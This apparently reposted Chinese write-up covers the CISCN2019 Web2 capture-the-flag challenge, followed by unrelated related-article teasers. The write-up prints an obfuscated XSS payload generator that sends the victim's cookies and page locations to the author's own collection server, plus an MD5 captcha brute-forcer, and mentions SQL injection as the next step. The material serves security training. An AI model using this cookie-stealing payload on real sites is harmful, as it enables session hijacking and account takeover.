[CISCN2019 华东北赛区]Web2

news/2024/5/19 23:20:37 标签: web安全, ctf, 笔记, 题解

[CISCN2019 华东北赛区]Web2

  • 随便注册一个登录,发现
    image.png
  • 还有反馈页面,一看就知道大概率是xss,应该是为了得到管理员cookie
  • 扫描了一下,果然有admin.php后台登录
    image.png
  • buu可以连接访问外网了,所以内部的xss平台关闭了,使用自己搭建的莲花平台,不过需要一个服务器

自己搭建的xss平台使用

搭建

参考
https://blog.csdn.net/weixin_44652484/article/details/134169568
搭建非常简单

使用

image.png
根据其他人的题解
payload

xss='''(function(){window.location.href='http://ip/xss_platform/?location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''  
output = ""  
for c in xss:  
output += "&#" + str(ord(c))  
  
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")
  • 然后提交文章,得到连接,来到反馈页面
    image.png
  • 说了要将域名改成web
    验证码
import hashlib
num=input()
for i in range(999999,10000000):
    m=hashlib.md5()
    m.update(str(i).encode())
    m=m.hexdigest()
    if m[:6]==num:
        print(i)
        break
  • 然后我得不到管理员的cookie啊,算了,反正思路是这样的,有没有大佬知道为什么的
  • 得到phpsessid之后登录,然后就是一个简单的sql注入

http://www.niftyadmin.cn/n/5452926.html

相关文章

软考系统架构设计师(摘抄)01

软考系统架构设计师(摘抄)01

架构师承担的责任 系统架构师设计师是承担系统架构设计的核心角色&#xff0c;他不仅是连接用户需求和系统进一步设计与实现的桥梁&#xff0c;也是系统开发早期阶段质量保证的关键角色。系统架构师就是项目的总设计师&#xff0c;他是一个既需要掌控整体又需要洞悉局部瓶颈&a…
阅读更多...
在vscode终端terminal加大栈空间How to increase max stack size in c++ using vscode

在vscode终端terminal加大栈空间How to increase max stack size in c++ using vscode

参考:https://devpress.csdn.net/cloud/63268204fd0b112779162383.html Answer a question In many dynamic programming and graph problems it is required to do long depth recursion. I am currently using vscode and mingw in windows for my c programs. But in defau…
阅读更多...
LeetCode 面试经典150题 205.同构字符串

LeetCode 面试经典150题 205.同构字符串

题目&#xff1a; 给定两个字符串 s 和 t &#xff0c;判断它们是否是同构的。 如果 s 中的字符可以按某种映射关系替换得到 t &#xff0c;那么这两个字符串是同构的。 每个出现的字符都应当映射到另一个字符&#xff0c;同时不改变字符的顺序。不同字符不能映射到同一个字…
阅读更多...
FastAPI+React全栈开发09 MongoDB的增删改查操作

FastAPI+React全栈开发09 MongoDB的增删改查操作

Chapter02 Setting Up the Document Store with MongoDB 09 MongoDB querying and CRUD operations FastAPIReact全栈开发09 MongoDB的增删改查操作 After all this setting up, downloading, and installing, it is finally time to see MongoDB in action and try to get …
阅读更多...
mac m1安装和使用nvm的问题

mac m1安装和使用nvm的问题

mac m1安装和使用nvm的问题 使用nvm管理多版本node 每个项目可能用的node版本不同&#xff0c;所以需要多个版本node来回切换 但是最近遇到安装v14.19.0时一直安装失败的问题。 首先说明一下&#xff0c;用的电脑是mac M1芯片 Downloading and installing node v14.19.0... …
阅读更多...
深度学习的发展历史(深度学习入门、学习指导)

深度学习的发展历史(深度学习入门、学习指导)

目录 &#x1f3c0;前言 ⚽历史 第一代神经网络&#xff08;1958-1969&#xff09; 第二代神经网络&#xff08;1986-1998&#xff09; 统计学习方法的春天&#xff08;1986-2006&#xff09; 第三代神经网络——DL&#xff08;2006-至今&#xff09; &#x1f3d0;总结…
阅读更多...
文本文件操作

文本文件操作

大家好&#xff1a; 衷心希望各位点赞。 您的问题请留在评论区&#xff0c;我会及时回答。 文件操作 程序运行时&#xff0c;产生的数据都是临时数据&#xff0c;程序一旦运行结束都会被释放。通过文件可以将数据持久化。 C中对文件进行操作需要包含头文件<fstream> 文件…
阅读更多...
Ps:必须知道的四大混合模式

Ps:必须知道的四大混合模式

在 Photoshop 中有多达六组 27 种混合模式&#xff0c;不仅可应用于图层之间&#xff0c;在画笔等工具、图层样式等里面也都有&#xff0c;几乎可以说是无处不在。 有关混合模式的原理及说明&#xff0c;请参阅&#xff1a; 《Ps 混合模式&#xff08;合集&#xff09;》 在所有…
阅读更多...
最新文章

Copyright @ 2022~2023